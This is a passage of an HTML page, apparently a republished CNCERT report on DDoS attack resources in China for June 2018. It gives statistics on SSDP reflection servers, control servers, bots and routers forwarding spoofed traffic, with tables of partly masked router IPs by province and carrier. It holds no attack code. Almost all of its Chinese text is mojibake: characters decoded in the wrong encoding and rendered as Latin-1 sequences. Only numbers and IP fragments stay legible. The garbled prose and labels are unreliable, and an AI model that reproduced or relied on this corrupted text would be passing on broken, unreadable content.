3101<p style="text-align: justify;">近两月被æŒç»åˆ©ç”¨å‘起攻击的SSDPåå°„æœåС噍ä¸ï¼Œå…±è®¡423,548个在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸297,805个ä½äºŽå¢ƒå†…,125,743个ä½äºŽå¢ƒå¤–。近两月æŒç»æ´»è·ƒçš„SSDPåå°„æœåŠ¡å™¨æŒ‰çœä»½ç»Ÿè®¡ï¼Œè¾½å®çœå 的比例最大,å 36.1%ï¼Œå…¶æ¬¡æ˜¯å‰æž—çœã€å¹¿ä¸œçœå’Œæ²³åŒ—çœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œè”通å 的比例最大,å 65.7%,电信å 29.3%,移动å 4.4%,如图14所示。 </p>
3102</p>
3103<p><img alt="近两月被æŒç»åˆ©ç”¨å‘起攻击的SSDPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140954354.png!small" width="690" height="312.63157894736844"> </p>
3104</p>
3105<p style="text-align: center;">图14 近两月被æŒç»åˆ©ç”¨å‘起攻击的SSDPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ</p>
3106</p>
3107<p style="text-align: justify;"><b>(4)å‘èµ·ä¼ªé€ æµé‡çš„è·¯ç”±å™¨åˆ†æž </b> </p>
3108</p>
3109<p style="text-align: justify;">A. è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</p>
3110</p>
3111<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6æœˆï¼Œé€šè¿‡è·¨åŸŸä¼ªé€ æµé‡å‘起攻击的æµé‡æ¥æºäºŽ193ä¸ªè·¯ç”±å™¨ã€‚æ ¹æ®å‚与攻击事件的数é‡ç»Ÿè®¡ï¼Œå½’属于新疆维å¾å°”自治区移动的路由器(221.X.X.5ã€221.X.X.9)和北京电信的路由器(219.X.X.70)å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼Œå¦‚表8所示。</p>
3112</p>
3113<p style="text-align: center;">表8 本月å‚ä¸Žæ”»å‡»æœ€å¤šçš„è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨TOP25 </p>
3114</p>
3115<table>
3116<colgroup>
3117<col>
3118<col>
3119<col> </colgroup>
3120<thead>
3121<tr>
3122<th>è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</th>
3123<th>归属çœä»½</th>
3124<th>归属è¿è¥å•†</th>
3125</tr>
3126</thead>
3127<tbody>
3128<tr>
3129<td>221.X.X.5</td>
3130<td>新疆维å¾å°”æ—自治区</td>
3131<td>移动</td>
3132</tr>
3133<tr>
3134<td>221.X.X.9</td>
3135<td>新疆维å¾å°”æ—自治区</td>
3136<td>移动</td>
3137</tr>
3138<tr>
3139<td>219.X.X.70</td>
3140<td>北京市</td>
3141<td>电信</td>
3142</tr>
3143<tr>
3144<td>221.X.X.6</td>
3145<td>新疆维å¾å°”æ—自治区</td>
3146<td>移动</td>
3147</tr>
3148<tr>
3149<td>118.X.X.169</td>
3150<td>å››å·çœ</td>
3151<td>电信</td>
3152</tr>
3153<tr>
3154<td>113.X.X.253</td>
3155<td>湖北çœ</td>
3156<td>è”通</td>
3157</tr>
3158<tr>
3159<td>113.X.X.252</td>
3160<td>湖北çœ</td>
3161<td>è”通</td>
3162</tr>
3163<tr>
3164<td>61.X.X.25</td>
3165<td>浙江çœ</td>
3166<td>电信</td>
3167</tr>
3168<tr>
3169<td>219.X.X.30</td>
3170<td>北京市</td>
3171<td>电信</td>
3172</tr>
3173<tr>
3174<td>211.X.X.48</td>
3175<td>云å—çœ</td>
3176<td>移动</td>
3177</tr>
3178<tr>
3179<td>211.X.X.43</td>
3180<td>贵州çœ</td>
3181<td>移动</td>
3182</tr>
3183<tr>
3184<td>222.X.X.200</td>
3185<td>山东çœ</td>
3186<td>电信</td>
3187</tr>
3188<tr>
3189<td>218.X.X.101</td>
3190<td>内蒙å¤è‡ªæ²»åŒº</td>
3191<td>è”通</td>
3192</tr>
3193<tr>
3194<td>118.X.X.168</td>
3195<td>å››å·çœ</td>
3196<td>电信</td>
3197</tr>
3198<tr>
3199<td>222.X.X.201</td>
3200<td>山东çœ</td>
3201<td>电信</td>
3202</tr>
3203<tr>
3204<td>220.X.X.235</td>
3205<td>浙江çœ</td>
3206<td>电信</td>
3207</tr>
3208<tr>
3209<td>221.X.X.254</td>
3210<td>江è‹çœ</td>
3211<td>è”通</td>
3212</tr>
3213<tr>
3214<td>221.X.X.246</td>
3215<td>江è‹çœ</td>
3216<td>è”通</td>
3217</tr>
3218<tr>
3219<td>220.X.X.236</td>
3220<td>浙江çœ</td>
3221<td>电信</td>
3222</tr>
3223<tr>
3224<td>124.X.X.250</td>
3225<td>上海市</td>
3226<td>电信</td>
3227</tr>
3228<tr>
3229<td>202.X.X.223</td>
3230<td>河北çœ</td>
3231<td>è”通</td>
3232</tr>
3233<tr>
3234<td>202.X.X.224</td>
3235<td>河北çœ</td>
3236<td>è”通</td>
3237</tr>
3238<tr>
3239<td>61.X.X.184</td>
3240<td>剿ž—çœ</td>
3241<td>è”通</td>
3242</tr>
3243<tr>
3244<td>61.X.X.185</td>
3245<td>剿ž—çœ</td>
3246<td>è”通</td>
3247</tr>
3248<tr>
3249<td>219.X.X.144</td>
3250<td>北京市</td>
3251<td>电信</td>
3252</tr>
3253</tbody>
3254</table>
3255<p style="text-align: justify;">è·¨åŸŸä¼ªé€ æµé‡æ¶‰åŠè·¯ç”±å™¨æŒ‰çœä»½åˆ†å¸ƒç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,å 12.4%,其次是江è‹çœå’Œå±±ä¸œçœï¼›æŒ‰è·¯ç”±å™¨æ‰€å±žè¿è¥å•†ç»Ÿè®¡ï¼Œè”通å 的比例最大,å 37.3%ï¼Œç”µä¿¡å æ¯”31.6%ï¼Œç§»åŠ¨å æ¯”31.1%,如图15所示。</p>
3256<p><img alt="è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141125783.png!small" width="690" height="280.1897533206831"> </p>
3257</p>
3258<p style="text-align: center;">图15 è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3259</p>
3260<p style="text-align: justify;">B. æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</p>
3261</p>
3262<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6æœˆï¼Œé€šè¿‡æœ¬åœ°ä¼ªé€ æµé‡å‘起攻击的æµé‡æ¥æºäºŽ395ä¸ªè·¯ç”±å™¨ã€‚æ ¹æ®å‚与攻击事件的数é‡ç»Ÿè®¡ï¼Œå½’属于山西çœç”µä¿¡çš„路由器(219.X.X.2ã€219.X.X.10)å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼Œå…¶æ¬¡æ˜¯å½’属于山东çœç”µä¿¡çš„路由器(150.X.X.1ã€150.X.X.2),如表9所示。</p>
3263</p>
3264<p style="text-align: center;">表9 本月å‚ä¸Žæ”»å‡»æœ€å¤šçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨TOP25 </p>
3265</p>
3266<table>
3267<colgroup>
3268<col>
3269<col>
3270<col> </colgroup>
3271<thead>
3272<tr>
3273<th>æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨</th>
3274<th>归属çœä»½</th>
3275<th>归属è¿è¥å•†</th>
3276</tr>
3277</thead>
3278<tbody>
3279<tr>
3280<td>219.X.X.2</td>
3281<td>山西çœ</td>
3282<td>电信</td>
3283</tr>
3284<tr>
3285<td>219.X.X.10</td>
3286<td>山西çœ</td>
3287<td>电信</td>
3288</tr>
3289<tr>
3290<td>150.X.X.1</td>
3291<td>山东çœ</td>
3292<td>电信</td>
3293</tr>
3294<tr>
3295<td>150.X.X.2</td>
3296<td>山东çœ</td>
3297<td>电信</td>
3298</tr>
3299<tr>
3300<td>118.X.X.169</td>
3301<td>å››å·çœ</td>
3302<td>电信</td>
3303</tr>
3304<tr>
3305<td>218.X.X.177</td>
3306<td>贵州çœ</td>
3307<td>移动</td>
3308</tr>
3309<tr>
3310<td>218.X.X.176</td>
3311<td>贵州çœ</td>
3312<td>移动</td>
3313</tr>
3314<tr>
3315<td>202.X.X.141</td>
3316<td>山西çœ</td>
3317<td>电信</td>
3318</tr>
3319<tr>
3320<td>220.X.X.253</td>
3321<td>北京市</td>
3322<td>电信</td>
3323</tr>
3324<tr>
3325<td>220.X.X.243</td>
3326<td>北京市</td>
3327<td>电信</td>
3328</tr>
3329<tr>
3330<td>202.X.X.143</td>
3331<td>山西çœ</td>
3332<td>电信</td>
3333</tr>
3334<tr>
3335<td>220.X.X.127</td>
3336<td>浙江çœ</td>
3337<td>电信</td>
3338</tr>
3339<tr>
3340<td>211.X.X.20</td>
3341<td>贵州çœ</td>
3342<td>移动</td>
3343</tr>
3344<tr>
3345<td>211.X.X.19</td>
3346<td>贵州çœ</td>
3347<td>移动</td>
3348</tr>
3349<tr>
3350<td>222.X.X.122</td>
3351<td>ç¦å»ºçœ</td>
3352<td>电信</td>
3353</tr>
3354<tr>
3355<td>222.X.X.121</td>
3356<td>ç¦å»ºçœ</td>
3357<td>电信</td>
3358</tr>
3359<tr>
3360<td>220.X.X.126</td>
3361<td>浙江çœ</td>
3362<td>电信</td>
3363</tr>
3364<tr>
3365<td>123.X.X.2</td>
3366<td>内蒙å¤è‡ªæ²»åŒº</td>
3367<td>电信</td>
3368</tr>
3369<tr>
3370<td>218.X.X.130</td>
3371<td>å››å·çœ</td>
3372<td>电信</td>
3373</tr>
3374<tr>
3375<td>202.X.X.167</td>
3376<td>山东çœ</td>
3377<td>电信</td>
3378</tr>
3379<tr>
3380<td>218.X.X.162</td>
3381<td>å››å·çœ</td>
3382<td>电信</td>
3383</tr>
3384<tr>
3385<td>221.X.X.233</td>
3386<td>å®å¤å›žæ—自治区</td>
3387<td>è”通</td>
3388</tr>
3389<tr>
3390<td>112.X.X.2</td>
3391<td>云å—çœ</td>
3392<td>电信</td>
3393</tr>
3394<tr>
3395<td>61.X.X.1</td>
3396<td>å››å·çœ</td>
3397<td>电信</td>
3398</tr>
3399<tr>
3400<td>211.X.X.10</td>
3401<td>贵州çœ</td>
3402<td>移动</td>
3403</tr>
3404</tbody>
3405</table>
3406<p style="text-align: justify;">æœ¬æœˆæœ¬åœ°ä¼ªé€ æµé‡æ¶‰åŠè·¯ç”±å™¨æŒ‰çœä»½åˆ†å¸ƒï¼Œæ±Ÿè‹çœå 的比例最大,å 11.1%,其次是山西çœã€é™•西çœå’Œå¹¿ä¸œçœï¼›æŒ‰è·¯ç”±å™¨æ‰€å±žè¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 45.3%ï¼Œç§»åŠ¨å æ¯”30.9%,è”é€šå æ¯”23.0%,如图16所示。</p>
3407<p><img alt="æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141273286.png!small" width="690" height="293.5282258064516"> </p>
3408</p>
3409<p style="text-align: center;">图16 æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3410</p>
3411<h2>è¿‘åŠå¹´æˆ‘å›½å¢ƒå†…æ”»å‡»èµ„æºæ´»è·ƒåŠæ²»ç†æƒ…况分æž</h2>
3412</p>
3413<p style="text-align: justify;">2018年以æ¥ï¼ŒCNCERT组织å„çœåˆ†ä¸å¿ƒï¼Œè”åˆå„地è¿è¥å•†ã€äº‘æœåС商ç‰å¯¹æˆ‘国境内的攻击资æºè¿›è¡Œäº†ä¸“项治ç†ã€‚ç»è¿‡åŠå¹´ä»¥æ¥çš„èµ„æºæ²»ç†å·¥ä½œï¼Œç»¼åˆå¢ƒå†…å„类攻击资æºçš„å˜åŒ–趋势,我们分æžå‘现控制端ã€è‚‰é¸¡ç‰èµ„æºçš„æœˆæ´»è·ƒæ•°é‡è¾ƒ2017年有了较明显的下é™è¶‹åŠ¿ï¼›æŽ§åˆ¶ç«¯ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ç‰èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼æœ‰ä¸€å®šç¨‹åº¦çš„上å‡ï¼Œæ„味ç€èµ„æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„资æºç¨³å®šæ€§é™ä½Žï¼›åå°„æœåŠ¡å™¨èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼ï¼Œæ–°å¢žçއä¸å˜ã€æ¶ˆäº¡çŽ‡å‘ˆçŽ°ä¸€å®šç¨‹åº¦çš„ä¸‹é™ï¼Œæ„味ç€å¯åˆ©ç”¨çš„èµ„æºæ•°é‡é€æ¥å‡å°‘。资æºçš„具体å˜åŒ–趋势如下:</p>
3414</p>
3415<h3>1. æˆ‘å›½å¢ƒå†…æ”»å‡»èµ„æºæ´»è·ƒæƒ…况分æž</h3>
3416</p>
3417<p><b>(1) 控制端资æº</b></p>
3418</p>
3419<p>近三个月以æ¥ï¼Œåˆ©ç”¨è‚‰é¸¡å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯å¹³å‡æ¯æœˆæ•°é‡ä¸º40个,较2017年平凿¯æœˆæ•°é‡ç›¸æ¯”下é™44%ã€‚å¢ƒå†…æŽ§åˆ¶ç«¯èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º81%,消亡率为83%,与2017年平凿¯æœˆ70%的新增率和71%的消亡率相比,资æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„稳定性é™ä½Žã€‚å…¶ä¸ï¼Œåªæœ‰1个ä½äºŽä¸Šæµ·çš„境内控制端(182.X.X.227)在近三个月甚至åŠå¹´å†…æŒç»æ´»è·ƒã€‚</p>
3420</p>
3421<p style="text-align: justify;"><b>(2) è‚‰é¸¡èµ„æº </b> </p>
3422</p>
3423<p style="text-align: justify;">近三个月以æ¥ï¼Œè¢«åˆ©ç”¨å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…è‚‰é¸¡å¹³å‡æ¯æœˆæ•°é‡ä¸º103,970个,与2017年平凿¯æœˆæ•°é‡ç›¸æ¯”下é™è¿‘50%ã€‚å¢ƒå†…è‚‰é¸¡èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º87%,消亡率为88%,与2017年平凿¯æœˆçš„æ–°å¢žçŽ‡å’Œçš„æ¶ˆäº¡çŽ‡ç›¸æ¯”æ— æ˜Žæ˜¾å˜åŒ–ï¼›å˜åœ¨3,209个肉鸡在近三个月内æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图17所示,主è¦ä½äºŽæµ™æ±Ÿçœã€å¹¿ä¸œçœå’Œå±±è¥¿çœï¼Œç”µä¿¡å 的比例最大。其ä¸ï¼Œå˜åœ¨78ä¸ªå¢ƒå†…è‚‰é¸¡åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月。</p>
3424<p><img alt="近三个月内æŒç»æ´»è·ƒçš„å¢ƒå†…è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141564676.png!small" width="690" height="356.1290322580645"> </p>
3425</p>
3426<p style="text-align: center;">图17 近三个月内æŒç»æ´»è·ƒçš„å¢ƒå†…è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3427</p>
3428<p style="text-align: justify;"><b>(3) åå°„æœåŠ¡å™¨èµ„æº</b></p>
3429</p>
3430<p style="text-align: justify;">近三个月以æ¥ï¼Œåˆ©ç”¨å¢ƒå†…æœåС噍ã€ä¸»æœºç‰è®¾æ–½å‘èµ·DDoSå射攻击的åå°„æœåС噍平凿•°é‡ä¸º2,812,943个。境内åå°„æœåŠ¡å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º81%,消亡率为84%,与2017年平凿¯æœˆçš„85%新增率和的71%消亡率相比,消亡率呈现增快趋势;å˜åœ¨75,777个åå°„æœåŠ¡å™¨åœ¨è¿‘ä¸‰ä¸ªæœˆå†…æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图18所示,主è¦ä½äºŽè¾½å®çœã€å¹¿ä¸œçœå’Œå‰æž—çœï¼Œè”通å 的比例最大。其ä¸ï¼Œå˜åœ¨85个境内åå°„æœåŠ¡å™¨åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月。</p>
3431</p>
3432<p><img alt="近三个月内æŒç»æ´»è·ƒçš„åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†æž" src="http://image.3001.net/images/20180724/15324141709042.png!small" width="690" height="333.2934131736527"> </p>
3433</p>
3434<p style="text-align: center;">图18 近三个月内æŒç»æ´»è·ƒçš„åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†æž</p>
3435</p>
3436<p style="text-align: justify;"><b>(4) è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3437</p>
3438<p style="text-align: justify;">近三个月以æ¥ï¼Œè¢«åˆ©ç”¨è½¬å‘è·¨åŸŸä¼ªé€ æ”»å‡»æµé‡çš„境内è¿è¥å•†è·¯ç”±å™¨å¹³å‡æ•°é‡ä¸º177ä¸ªï¼›å¢ƒå†…è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º33%,消亡率为29%,与2017年平凿¯æœˆ22%的新增率和20%的消亡率相比,资æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„稳定性é™ä½Žï¼›å˜åœ¨72ä¸ªè·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨åœ¨è¿‘三个月内æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图19所示,主è¦ä½äºŽå¹¿ä¸œçœã€ä¸Šæµ·å¸‚和四å·çœï¼Œç”µä¿¡æ‰€å 的比例最大。其ä¸ï¼Œå˜åœ¨9ä¸ªåŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月,详细信æ¯å¦‚表10所示。</p>
3439</p>
3440<p><img alt="近三个月内æŒç»æ´»è·ƒçš„è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141835411.png!small" width="690" height="294.75728155339806"></p>
3441<p style="text-align: center;">图19 近三个月内æŒç»æ´»è·ƒçš„è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3442</p>
3443<p style="text-align: center;">表10 è¿‘ä¸¤å¹´åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月的跨域æµé‡æ¥æºè·¯ç”±å™¨ä¿¡æ¯</p>
3444</p>
3445<table>
3446<colgroup>
3447<col>
3448<col>
3449<col>
3450<col> </colgroup>
3451<thead>
3452<tr>
3453<th>è·¨åŸŸä¼ªé€ æ¥æºè·¯ç”±å™¨</th>
3454<th>åŽ†å²æ´»è·ƒæœˆä»½</th>
3455<th>所属çœä»½</th>
3456<th>所属è¿è¥å•†</th>
3457</tr>
3458</thead>
3459<tbody>
3460<tr>
3461<td>61.X.X.25</td>
3462<td>13</td>
3463<td>浙江</td>
3464<td>电信</td>
3465</tr>
3466<tr>
3467<td>219.X.X.30</td>
3468<td>14</td>
3469<td>北京</td>
3470<td>电信</td>
3471</tr>
3472<tr>
3473<td>218.X.X.254</td>
3474<td>13</td>
3475<td>山东</td>
3476<td>è”通</td>
3477</tr>
3478<tr>
3479<td>180.X.X.2</td>
3480<td>13</td>
3481<td>北京</td>
3482<td>电信</td>
3483</tr>
3484<tr>
3485<td>218.X.X.254</td>
3486<td>13</td>
3487<td>山东</td>
3488<td>è”通</td>
3489</tr>
3490<tr>
3491<td>221.X.X.2</td>
3492<td>14</td>
3493<td>天津</td>
3494<td>电信</td>
3495</tr>
3496<tr>
3497<td>221.X.X.1</td>
3498<td>14</td>
3499<td>天津</td>
3500<td>电信</td>
3501</tr>
3502<tr>
3503<td>221.X.X.254</td>
3504<td>14</td>
3505<td>广东</td>
3506<td>è”通</td>
3507</tr>
3508<tr>
3509<td>219.X.X.70</td>
3510<td>14</td>
3511<td>北京</td>
3512<td>电信</td>
3513</tr>
3514</tbody>
3515</table>
3516<p style="text-align: justify;"><b>(5) æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3517</p>
3518<p style="text-align: justify;">近三个月以æ¥ï¼Œè¢«åˆ©ç”¨è½¬å‘ä¼ªé€ æœ¬åŒºåŸŸæ”»å‡»æµé‡çš„境内è¿è¥å•†è·¯ç”±å™¨å¹³å‡æ•°é‡ä¸º440ä¸ªï¼›å¢ƒå†…æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ä¸º23%,消亡率为29%,与2017年平凿¯æœˆ14%的新增率和13%的消亡率相比,资æºå˜åŒ–é€Ÿåº¦æœ‰è¾ƒæ˜Žæ˜¾çš„åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„稳定性é™ä½Žï¼›å˜åœ¨174ä¸ªæœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨åœ¨è¿‘三个月内æŒç»æ´»è·ƒï¼Œå…¶æ‰€å±žçœä»½å’Œè¿è¥å•†åˆ†å¸ƒå¦‚图20所示,主è¦ä½äºŽæ±Ÿè‹çœã€æµ™æ±Ÿçœå’Œå¹¿ä¸œçœï¼Œç”µä¿¡å 的比例最大。其ä¸ï¼Œæœ‰20ä¸ªè·¯ç”±å™¨åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月,如表11所示。</p>
3519</p>
3520<p><img alt="近三个月内æŒç»æ´»è·ƒçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324141976182.png!small" width="690" height="278.160469667319"> </p>
3521<p style="text-align: center;">图20 近三个月内æŒç»æ´»è·ƒçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
3522</p>
3523<p style="text-align: center;">
3524</p>
3525<p style="text-align: center;">表11 è¿‘ä¸¤å¹´åŽ†å²æ´»è·ƒæœˆåº¦è¶…过12个月的跨域æµé‡æ¥æºè·¯ç”±å™¨ä¿¡æ¯</p>
3526</p>
3527<table>
3528<colgroup>
3529<col>
3530<col>
3531<col>
3532<col> </colgroup>
3533<thead>
3534<tr>
3535<th>æœ¬åœ°ä¼ªé€ æ¥æºè·¯ç”±å™¨</th>
3536<th>åŽ†å²æ´»è·ƒæœˆåº¦</th>
3537<th>所属çœä»½</th>
3538<th>所属è¿è¥å•†</th>
3539</tr>
3540</thead>
3541<tbody>
3542<tr>
3543<td>124.X.X.1</td>
3544<td>14</td>
3545<td>山西</td>
3546<td>è”通</td>
3547</tr>
3548<tr>
3549<td>124.X.X.2</td>
3550<td>14</td>
3551<td>山西</td>
3552<td>è”通</td>
3553</tr>
3554<tr>
3555<td>218.X.X.101</td>
3556<td>13</td>
3557<td>河北</td>
3558<td>移动</td>
3559</tr>
3560<tr>
3561<td>220.X.X.243</td>
3562<td>13</td>
3563<td>北京</td>
3564<td>电信</td>
3565</tr>
3566<tr>
3567<td>202.X.X.159</td>
3568<td>13</td>
3569<td>江西</td>
3570<td>电信</td>
3571</tr>
3572<tr>
3573<td>202.X.X.155</td>
3574<td>13</td>
3575<td>ç¦å»º</td>
3576<td>电信</td>
3577</tr>
3578<tr>
3579<td>202.X.X.156</td>
3580<td>13</td>
3581<td>江西</td>
3582<td>电信</td>
3583</tr>
3584<tr>
3585<td>202.X.X.157</td>
3586<td>13</td>
3587<td>江西</td>
3588<td>电信</td>
3589</tr>
3590<tr>
3591<td>202.X.X.158</td>
3592<td>13</td>
3593<td>江西</td>
3594<td>电信</td>
3595</tr>
3596<tr>
3597<td>202.X.X.151</td>
3598<td>13</td>
3599<td>ç¦å»º</td>
3600<td>电信</td>
3601</tr>
3602<tr>
3603<td>202.X.X.154</td>
3604<td>13</td>
3605<td>ç¦å»º</td>
3606<td>电信</td>
3607</tr>
3608<tr>
3609<td>202.X.X.150</td>
3610<td>13</td>
3611<td>ç¦å»º</td>
3612<td>电信</td>
3613</tr>
3614<tr>
3615<td>220.X.X.253</td>
3616<td>13</td>
3617<td>北京</td>
3618<td>电信</td>
3619</tr>
3620<tr>
3621<td>222.X.X.122</td>
3622<td>13</td>
3623<td>ç¦å»º</td>
3624<td>电信</td>
3625</tr>
3626<tr>
3627<td>222.X.X.121</td>
3628<td>13</td>
3629<td>ç¦å»º</td>
3630<td>电信</td>
3631</tr>
3632<tr>
3633<td>61.X.X.26</td>
3634<td>13</td>
3635<td>浙江</td>
3636<td>电信</td>
3637</tr>
3638<tr>
3639<td>219.X.X.1</td>
3640<td>13</td>
3641<td>山西</td>
3642<td>电信</td>
3643</tr>
3644<tr>
3645<td>61.X.X.8</td>
3646<td>13</td>
3647<td>浙江</td>
3648<td>电信</td>
3649</tr>
3650<tr>
3651<td>61.X.X.4</td>
3652<td>13</td>
3653<td>浙江</td>
3654<td>电信</td>
3655</tr>
3656<tr>
3657<td>220.X.X.59</td>
3658<td>13</td>
3659<td>江西</td>
3660<td>电信</td>
3661</tr>
3662</tbody>
3663</table>
3664<h3>2. è¿‘åŠå¹´å„çœæ²»ç†æƒ…况分æž</h3>
3665</p>
3666<p style="text-align: justify;">è¿‘åŠå¹´æ¥ï¼Œå„çœä»½èµ„æºæ•°é‡æŽ’åå˜åŒ–情况如图21至图25所示,图ä¸çºµè½´ä¸ºçœä»½ï¼Œæ¨ªè½´ä¸ºæŽ’å。红色的点表示å„çœæ”»å‡»æ•°é‡åœ¨æŸæœˆçš„æŽ’åæƒ…况,月份越临近,点越大;月份越久远,点越å°ã€‚例如,最å°çš„点代表的是2017年全年å„çœèµ„æºæ•°é‡æŽ’å;最大的点代表的是2018å¹´6æœˆçš„èµ„æºæ•°é‡æŽ’å。</p>
3667</p>
3668<p style="text-align: justify;">图ä¸ä½“现的排åå˜åŒ–å˜åœ¨ä»¥ä¸‹æƒ…况:(1)红点如从左至å³ç”±å°å˜å¤§ï¼Œåˆ™è¡¨æ˜Žèµ„æºæŽ’åç›¸è¾ƒå¥½è½¬ï¼Œæ²»ç†æ•ˆæžœè¾ƒæ˜Žæ˜¾ï¼›ï¼ˆ2)红点从左至å³ç”±å¤§å˜å°ï¼Œè¡¨æ˜Žèµ„æºæŽ’åç›¸è¾ƒæ— å¥½è½¬æˆ–æ¶åŒ–;(3)红点æŒç»ä½äºŽå·¦ä¾§ï¼Œè¡¨æ˜Žèµ„æºæ•°é‡æŽ’å一直ä½äºŽå‰åˆ—;(4)红点æŒç»ä½äºŽå³ä¾§ï¼Œè¡¨æ˜Žèµ„æºæ•°é‡æŽ’在åŽéƒ¨ï¼›ï¼ˆ5ï¼‰å›¾ä¸æœªå‡ºçŽ°çš„çœä»½ï¼Œè¡¨æ˜Ž2017å¹´ä»¥æ¥æœªåœ¨è¯¥çœå‘现过æ¤ç±»æ´»è·ƒæ”»å‡»èµ„æºã€‚</p>
3669</p>
3670<p style="text-align: justify;"><b>(1) 控制端资æº</b></p>
3671</p>
